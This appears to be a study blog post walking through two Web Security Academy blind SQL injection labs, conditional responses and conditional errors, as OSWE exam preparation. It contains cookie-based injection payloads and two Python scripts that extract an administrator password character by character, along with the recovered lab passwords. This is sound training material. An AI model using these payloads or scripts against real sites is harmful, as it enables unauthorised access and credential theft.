This topic is explained in details in OSWE courses, and I assume that it will be tested in the exam.

Lab: Blind SQL injection with conditional responses

Intro

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

Try with the traditional injection method to select username and password from users table but there is no output. Start the session in burp.
In burp session, it is noticed that the web page contains session id:

1
Cookie: TrackingId=vQKvLxRCijcrlFoo; session=1kmuR4Flcru129GQHmwUqNTKz12AbG2J

It can be verified that TrackingId is vulnerable to SQL Injection, because a input like TrackingId=a' or 1=1-- will introduce an welcome back on home page. A blind SQL injection is thus possible through conditional response (if welcome back appears).
We can then manually verify the administrator account exists in target db:

1
Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator'--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo

After that, we can determine the length of the password for user administrator

1
Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and length(password)=20--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo

This proves that password is 20-char long, which means we cannot manually brute-force the password. I develop the following python code to verify the blind SQL Injection vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import sys

def blind_sql_injection(url, length):
    output = ''
    target = url
    headers={}
    for i in range(1, length+1):
        base_cookie = "TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and (ascii(substring(password,%s,1)))=[CHAR]--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo"%str(i)
        for j in range(32,126):
            print("Currently trying digit %s with: "%str(i), chr(j))
            cookie = base_cookie.replace("[CHAR]",str(j))
            headers["cookie"]=cookie
            res = requests.get(url, headers=headers)
            if "Welcome" in res.content.decode('utf-8'):
                output += chr(j)
                break
        print("Current password: ", output)

url = "https://acff1f841e04dc72802261c1003500e8.web-security-academy.net/"
blind_sql_injection(url, 20)

The final password is: futqttlev8verb4m7res

Lab: Blind SQL injection with conditional errors

Intro

his lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

This lab is similar to the previous one, where conditional response is replaced by conditional errors. I didn’t know much about conditional error injection and I mostly refer to: SQL_Injection_Cheatsheet
Based on the conditional error injection sentence, I developed the cookie to be:
Cookie: TrackingId=' UNION SELECT CASE WHEN (condition) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
With the same technique, we can identify that user administrator is within users db:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Now I can identify the length of the password for administrator user:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator' and length(password)=20) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Same as the previous example, the password length is 20. Let’s develop the python script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
import sys

def blind_sql_injection(url, length):
    output = ''
    target = url
    headers={}
    for i in range(1, length+1):
        base_cookie = "TrackingId=' UNION SELECT CASE WHEN (username='administrator' and ascii(substr(password,%s,1))= [CHAR])  THEN to_char(1/0) ELSE NULL END FROM users--; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs"%str(i)
        for j in range(32,126):
            print("Currently trying digit %s with: "%str(i), chr(j))
            cookie = base_cookie.replace("[CHAR]",str(j))
            headers["cookie"]=cookie
            res = requests.get(url, headers=headers)
            if 500 == res.status_code:
                output += chr(j)
                break
        print("Current password: ", output)





url = "https://ac171f7e1e01e39e80cb0f6f004000f7.web-security-academy.net"
blind_sql_injection(url, 20)

The final password is: tdosf5caziu4dsh5ry1j

EndNote

In the original online lab solution, it is suggested to use Burp Intruder to conduct the attack. However, OSWE official suggested to use python instead of Burp. To keep this consistency, I use the similar coding style as OSWE official (with ascii(substring)) to prepare for the exam.